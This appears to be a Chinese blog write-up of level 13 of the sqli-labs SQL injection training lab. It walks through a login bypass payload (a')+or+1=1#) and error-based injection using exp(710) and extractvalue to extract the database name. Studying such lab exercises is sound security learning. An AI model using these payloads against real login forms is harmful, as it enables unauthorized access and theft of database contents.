sqllab第十三关通关笔记

知识点:

  • 登录框处常见的语句(一般都是查询语句)
    • where username=''
    • where username=""
    • where usernam=('')
    • where username=("")
  • 错误注入知识回顾
  • 这里使用错误注入

通过admin admin登录发现没有任何回显信息;但是有成功登录的提示

通过bp抓包进行尝试绕过

尝试用单引号看看效果

构造payload:username=admin'

发现了报错信息;应该是一个where username=('输入内容')

好好好,这就好绕过了

构造payload:username=a')+or1=1#

欸,又报错了,发现了更多的信息;两个参数都是('输入内容');但是为啥会报错呢??

仔细一看发现or后面没加空格

重新构造payload:username=a')+or+1=1#

成功登录了;由于没有回显,这里不能用联合注入;

尝试进行错误注入

构造payload:username=a')+or+exp(710)#

成功打印了错误信息;说明这里是可以进行报错注入的

接下来利用报错注入获取数据库名

构造payload:username=a')+or+extractvalue(1,concat(0x7e,database(),0x7e))#

成功获取了数据库名;

到这里就结束了;报错注入获取表名和字段信息以及敏感内容信息在前几关就展示了;这里就不再进行演示了

10

相关推荐
序属秋秋秋1 小时前
《C++初阶之内存管理》【内存分布 + operator new/delete + 定位new】
开发语言·c++·笔记·学习
quant_19863 小时前
R语言如何接入实时行情接口
开发语言·经验分享·笔记·python·websocket·金融·r语言
宝山哥哥8 小时前
网络信息安全学习笔记1----------网络信息安全概述
网络·笔记·学习·安全·网络安全
逼子格9 小时前
逻辑门电路Multisim电路仿真汇总——硬件工程师笔记
笔记·硬件工程师·multisim·电路仿真·逻辑门·硬件工程师学习·电路图
@Hwang9 小时前
【ESP32-IDF笔记】09-UART配置和使用
笔记·esp32·uart·esp32s3·esp32-idf
霖0010 小时前
C++学习笔记三
运维·开发语言·c++·笔记·学习·fpga开发
巴伦是只猫11 小时前
【机器学习笔记 Ⅲ】1 无监督学习
笔记·学习·机器学习
kfepiza12 小时前
Debian10安装Mysql5.7.44 笔记250707
笔记·mysql·debian
kfepiza12 小时前
Linux的`if test`和`if [ ]中括号`的取反语法比较 笔记250709
linux·服务器·笔记·bash
李元豪13 小时前
【知足常乐ai笔记】机器人强化学习
人工智能·笔记·机器人